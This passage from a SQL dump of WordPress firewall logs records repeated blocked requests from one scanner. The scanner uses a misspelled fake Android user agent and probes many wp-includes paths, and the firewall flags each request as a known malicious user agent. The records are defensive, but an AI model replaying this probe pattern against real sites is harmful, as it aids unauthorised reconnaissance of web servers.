User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtdG9rZW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134195,1699995140.138427,1699995140.129700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-span.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtc3Bhbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134196,1699995137.130197,1699995137.108500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134197,1699995132.359352,1699995132.345300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/Diff/Engine/Engine/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi9FbmdpbmUvRW5naW5lLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134198,1699995128.828965,1699995128.820200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/SodiumException.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL1NvZGl1bUV4Y2VwdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134199,1699995127.200451,1699995127.191700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/Crypto32.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL0NyeXB0bzMyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134200,1699995125.590405,1699995125.577400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/Crypto.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL0NyeXB0by5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134201,1699995124.114364,1699995124.103000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/Compat.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL0NvbXBhdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134202,1699995121.041022,1699995121.032300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Auth/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0F1dGgv\",\"category\":\"brute-force\",\"ssl\":1}'),(134203,1699995118.950104,1699995118.941200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Exception/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0V4Y2VwdGlvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134204,1699995116.009831,1699995115.998400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/images/wlw/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy93bHcv\",\"category\":\"brute-force\",\"ssl\":1}'),(134205,1699995107.964909,1699995107.952700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Exception/HTTP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0V4Y2VwdGlvbi9IVFRQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134206,1699995105.100794,1699995105.092000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Utility/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1V0aWxpdHkv\",\"category\":\"brute-force\",\"ssl\":1}'),(134207,1699995103.651951,1699995103.643000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Transport/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1RyYW5zcG9ydC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134208,1699995102.072959,1699995102.062600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Response/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1Jlc3BvbnNlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134209,1699995100.499954,1699995100.488700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Proxy/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1Byb3h5Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134210,1699995098.737014,1699995098.728300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Cookie/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0Nvb2tpZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134211,1699995091.119462,1699995091.110600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Content/Type/Sniffer.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Db250ZW50L1R5cGUvU25pZmZlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134212,1699995087.903086,1699995087.894300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Redis.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9SZWRpcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134213,1699995086.231779,1699995086.217000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/MySQL.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NeVNRTC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134214,1699995084.350034,1699995084.341400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Memcached.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NZW1jYWNoZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134215,1699995082.776530,1699995082.767600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Memcache.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NZW1jYWNoZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134216,1699995081.228911,1699995081.219300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/DB.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9EQi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134217,1699995079.483878,1699995079.474900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Base.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9CYXNlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134218,1699995074.344288,1699995074.335500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134219,1699995072.602432,1699995072.593600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/utils.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3V0aWxzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134220,1699995070.818422,1699995070.808900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/spacing.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 